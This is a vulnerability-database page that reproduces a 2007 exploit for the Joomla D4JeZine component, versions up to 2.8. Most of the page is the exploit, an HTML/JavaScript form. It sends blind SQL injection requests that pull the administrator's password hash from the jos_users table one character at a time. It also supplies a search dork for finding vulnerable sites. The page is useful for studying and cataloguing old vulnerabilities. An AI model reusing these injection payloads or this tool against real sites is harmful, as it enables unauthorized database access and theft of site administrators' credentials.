Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Joomla Component D4JeZine <= 2.8 Remote BLIND SQL Injection Exploit

🗓️ 28 Mar 2007 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 42 Views

Joomla Component D4JeZine <= 2.8 Remote BLIND SQL Injection Exploi

Code

                                                <html>
<head>
<title>Joomla&nbsp;Component&nbsp;D4JeZine&nbsp;<=&nbsp;2.8&nbsp;Remote&nbsp;BLIND&nbsp;SQL&nbsp;Injection&nbsp;Exploit</title>

<script&nbsp;type=\"text/javascript\">

//\'===============================================================================================
//\'[Script&nbsp;Name:&nbsp;Joomla&nbsp;Component&nbsp;D4JeZine&nbsp;<=&nbsp;2.8&nbsp;Remote&nbsp;BLIND&nbsp;SQL&nbsp;Injection&nbsp;Exploit
//\'[Coded&nbsp;by&nbsp;&nbsp;&nbsp;:&nbsp;ajann
//\'[Author&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;ajann
//\'[Contact&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;:(
//\'[Dork&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;index.php?option=com_ezine
//\'[S.Page&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;http://designforjoomla.com/
//\'[$$&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;$24.95&nbsp;USD
//\'[Using&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;Write&nbsp;Target&nbsp;after&nbsp;Submit&nbsp;Click
//\'[Method&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;One&nbsp;Char&nbsp;Brute&nbsp;Force&nbsp;Technique
//\'===============================================================================================


&nbsp;&nbsp;&nbsp;function&nbsp;nesneyarat()&nbsp;{

&nbsp;var&nbsp;nesne;
&nbsp;var&nbsp;tarayici&nbsp;=&nbsp;navigator.appName;

&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(tarayici&nbsp;==&nbsp;\"Microsoft&nbsp;Internet&nbsp;Explorer\"){
&nbsp;nesne&nbsp;=&nbsp;new&nbsp;ActiveXObject(\"Microsoft.XMLHTTP\");
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;else&nbsp;{
&nbsp;nesne&nbsp;=&nbsp;new&nbsp;XMLHttpRequest();

&nbsp;&nbsp;}
return&nbsp;nesne;
}

&nbsp;var&nbsp;http&nbsp;=&nbsp;nesneyarat();



&nbsp;&nbsp;&nbsp;function&nbsp;islemlink(adresyolla,charyolla)&nbsp;{


articleidim=document.getElementById(\'articleid\').value
file=\"index.php?option=com_ezine&task=read&page=1&article=\"+&nbsp;articleidim
pathim=document.getElementById(\'path\').value&nbsp;+&nbsp;file
karakterim=document.getElementById(\'karakter\').value&nbsp;+&nbsp;charyolla
adres=document.getElementById(\'adresim\').value&nbsp;+&nbsp;pathim&nbsp;+&nbsp;&nbsp;adresyolla&nbsp;+&nbsp;karakterim


&nbsp;

&nbsp;http.open(\'get\',&nbsp;adres);
&nbsp;http.onreadystatechange&nbsp;=&nbsp;cevapFonksiyonu;
&nbsp;http.send(null);
&nbsp;&nbsp;&nbsp;

}



&nbsp;&nbsp;&nbsp;function&nbsp;cevapFonksiyonu()&nbsp;{
&nbsp;if(http.readyState&nbsp;==&nbsp;4){
document.getElementById(\'mesaj\').value&nbsp;=&nbsp;http.responseText;
yonlendir();

}
}



function&nbsp;yonlendir()&nbsp;{

&nbsp;&nbsp;if&nbsp;(document.getElementById(\'mesaj\').value.indexOf(\'<td&nbsp;width=\"100%\"&nbsp;class=\"contentheading\"&nbsp;valign=\"top\">\',&nbsp;0)&nbsp;==&nbsp;-1)&nbsp;{
&nbsp;alert(\'False\');

&nbsp;&nbsp;}


&nbsp;&nbsp;}

function&nbsp;dal()&nbsp;{

if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(0)\")&nbsp;{
&nbsp;
&nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true;
islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/jos_users/**/WHERE/**/id=1),\',\',1))=48)/*\');
&nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(1)\"
&nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(1)\")&nbsp;{
&nbsp;
&nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true;
islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/jos_users/**/WHERE/**/id=1),\',\',1))=49)/*\');
&nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(2)\"
&nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(2)\")&nbsp;{
&nbsp;
&nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true;
islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/jos_users/**/WHERE/**/id=1),\',\',1))=50)/*\');
&nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(3)\"
&nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(3)\")&nbsp;{
&nbsp;
&nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true;
islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/jos_users/**/WHERE/**/id=1),\',\',1))=51)/*\');
&nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(4)\"
&nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(4)\")&nbsp;{
&nbsp;
&nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true;
islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/jos_users/**/WHERE/**/id=1),\',\',1))=52)/*\');
&nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(5)\"
&nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(5)\")&nbsp;{
&nbsp;
&nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true;
islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/jos_users/**/WHERE/**/id=1),\',\',1))=53)/*\');
&nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(6)\"
&nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(6)\")&nbsp;{
&nbsp;
&nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true;
islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/jos_users/**/WHERE/**/id=1),\',\',1))=54)/*\');
&nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(7)\"
&nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(7)\")&nbsp;{
&nbsp;
&nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true;
islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/jos_users/**/WHERE/**/id=1),\',\',1))=55)/*\');
&nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(8)\"
&nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(8)\")&nbsp;{
&nbsp;
&nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true;
islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/jos_users/**/WHERE/**/id=1),\',\',1))=56)/*\');
&nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(9)\"
&nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(9)\")&nbsp;{
&nbsp;
&nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true;
islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/jos_users/**/WHERE/**/id=1),\',\',1))=57)/*\');
&nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(a)\"
&nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(a)\")&nbsp;{
&nbsp;
&nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true;
islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/jos_users/**/WHERE/**/id=1),\',\',1))=97)/*\');
&nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(b)\"
&nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(b)\")&nbsp;{
&nbsp;
&nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true;
islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/jos_users/**/WHERE/**/id=1),\',\',1))=98)/*\');
&nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(c)\"
&nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(c)\")&nbsp;{
&nbsp;
&nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true;
islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/jos_users/**/WHERE/**/id=1),\',\',1))=99)/*\');
&nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(d)\"
&nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(d)\")&nbsp;{
&nbsp;
&nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true;
islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/jos_users/**/WHERE/**/id=1),\',\',1))=100)/*\');
&nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(e)\"
&nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(e)\")&nbsp;{
&nbsp;
&nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true;
islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/jos_users/**/WHERE/**/id=1),\',\',1))=101)/*\');
&nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(f)\"
&nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(f)\")&nbsp;{
&nbsp;
&nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true;
islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/jos_users/**/WHERE/**/id=1),\',\',1))=102)/*\');
&nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Finished\"
&nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000);
return&nbsp;false;

&nbsp;}



&nbsp;&nbsp;}


</script>

&nbsp;&nbsp;&nbsp;</head>

&nbsp;<body&nbsp;bgcolor=\"#000000\">

<center>

<p><b><font&nbsp;face=\"Verdana\"&nbsp;size=\"2\"&nbsp;color=\"#008000\">Joomla&nbsp;Component&nbsp;D4JeZine&nbsp;<=&nbsp;2.8&nbsp;Remote&nbsp;BLIND&nbsp;SQL&nbsp;Injection&nbsp;Exploit</font></b></p>

<p></p>
&nbsp;&nbsp;&nbsp;&nbsp;<b><font&nbsp;face=\"Arial\"&nbsp;size=\"1\"&nbsp;color=\"#FF0000\">Target:</font><font&nbsp;face=\"Arial\"&nbsp;size=\"1\"&nbsp;color=\"#808080\">[http://[target]/</font><font&nbsp;color=\"#00FF00\"&nbsp;size=\"2\"&nbsp;face=\"Arial\">
&nbsp;&nbsp;</font><font&nbsp;color=\"#FF0000\"&nbsp;size=\"2\">&nbsp;</font></b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;<input&nbsp;type=\"text\"&nbsp;name=\"adresim\"&nbsp;size=\"20\"&nbsp;style=\"background-color:&nbsp;#808000\"&nbsp;onmouseover=\"javascript:this.style.background=\'#808080\';\"&nbsp;onmouseout=\"javascript:this.style.background=\'#808000\';\"&nbsp;value=\"http://\"></p>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;<b><font&nbsp;face=\"Arial\"&nbsp;size=\"1\"&nbsp;color=\"#FF0000\">&nbsp;Path:</font><font&nbsp;face=\"Arial\"&nbsp;size=\"1\"&nbsp;color=\"#808080\">[http://[target]/[scriptpath]&nbsp;&nbsp;&nbsp;&nbsp;</font></b>
&nbsp;&nbsp;<input&nbsp;type=\"text\"&nbsp;name=\"path\"&nbsp;size=\"20\"&nbsp;style=\"background-color:&nbsp;#808000\"&nbsp;onmouseover=\"javascript:this.style.background=\'#808080\';\"&nbsp;onmouseout=\"javascript:this.style.background=\'#808000\';\"&nbsp;value=\"/\">
&nbsp;&nbsp;<p>
&nbsp;&nbsp;&nbsp;&nbsp;<b><font&nbsp;face=\"Arial\"&nbsp;size=\"1\"&nbsp;color=\"#FF0000\">&nbsp;Character:</font><font&nbsp;face=\"Arial\"&nbsp;size=\"1\"&nbsp;color=\"#808080\">[Md5&nbsp;
&nbsp;&nbsp;Character&nbsp;1-32]&nbsp;&nbsp;&nbsp;</font></b>
&nbsp;&nbsp;<input&nbsp;type=\"text\"&nbsp;name=\"karakter\"&nbsp;size=\"20\"&nbsp;style=\"background-color:&nbsp;#808000\"&nbsp;onmouseover=\"javascript:this.style.background=\'#808080\';\"&nbsp;onmouseout=\"javascript:this.style.background=\'#808000\';\"&nbsp;value=\"1\">
</p>
&nbsp;&nbsp;<p>
&nbsp;&nbsp;&nbsp;&nbsp;<b><font&nbsp;face=\"Arial\"&nbsp;size=\"1\"&nbsp;color=\"#FF0000\">&nbsp;Article&nbsp;ID</font><font&nbsp;face=\"Arial\"&nbsp;size=\"1\"&nbsp;color=\"#808080\">[Article&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;ID&nbsp;Numeric]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</font></b>
&nbsp;&nbsp;<input&nbsp;type=\"text\"&nbsp;name=\"articleid\"&nbsp;size=\"20\"&nbsp;style=\"background-color:&nbsp;#808000\"&nbsp;onmouseover=\"javascript:this.style.background=\'#808080\';\"&nbsp;onmouseout=\"javascript:this.style.background=\'#808000\';\"&nbsp;value=\"1\">
</p>
&nbsp;&nbsp;<p><input&nbsp;type=\"submit\"&nbsp;value=\"Test&nbsp;Character(0)\"&nbsp;name=\"buton\"&nbsp;onclick=\"dal();\"></p>
<br>
<textarea&nbsp;name=\"mesaj\"&nbsp;rows=\"1\"&nbsp;cols=\"20\"&nbsp;style=\"visibility:hidden\"></textarea>&nbsp;<br>
<p>

<b><font&nbsp;face=\"Verdana\"&nbsp;size=\"2\"&nbsp;color=\"#008000\">ajann</font></b></p>
</p>
</center>


&nbsp;</body>
&nbsp;</html>

&nbsp;

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Mar 2007 00:00Current
7.1High risk
Vulners AI Score7.1
joomla component d4jezineremote blind sqlexploitsecurityvulnerability
42